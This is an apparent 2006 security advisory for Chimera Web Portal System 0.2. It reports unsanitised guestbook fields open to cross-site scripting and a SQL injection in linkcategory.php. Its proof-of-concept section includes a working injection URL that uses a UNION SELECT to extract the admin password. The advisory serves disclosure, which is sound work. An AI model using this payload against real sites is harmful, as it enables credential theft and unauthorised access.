Multiple Vulnerabilities in Chimera Web Portal System

Summary

Vulnerability: Multiple Vulnerabilities in Chimera Web Portal System
Discovered: 2006.01.01
Last Update: 0 n/a
ID: EV0007
CVE: CVE-2006-0136, CVE-2006-0137
Risk Level: medium
Type: Multiple Vulnerabilities
Status: Unpatched
Vendor: Phanatic Softwares (http://www.psoftwares.f2s.com/)
Vulnerable Software: Chimera Web Portal System (http://sourceforge.net/projects/chimera/)
Version: 0.2
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple vulnerabilities were found in the Chimera Web Portal System (http://sourceforge.net/projects/chimera/) script.

XSS

Vulnerable script: modules.php

The variables comment_poster, comment_poster_email, comment_poster_homepage and comment_text aren't sanitized. Users can post messages containing any script code.

SQL Injection

Vulnerable script: linkcategory.php

The variable $id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

PoC/Exploit

XSS

Guestbook:
http://host/chimera/modules.php?name=guestbook&file=index

comment_poster=<XSS>

comment_poster_email=<XSS>

comment_poster_homepage=<XSS>

comment_text=<XSS>

SQL Injection

Admin password:
http://host/chimera/linkcategory.php?id=9999'%20union%20select%20admin_password%20from%20admin/*

Solution

A solution for "Multiple Vulnerabilities in Chimera Web Portal System" is not available. Check the Phanatic Softwares website for updates.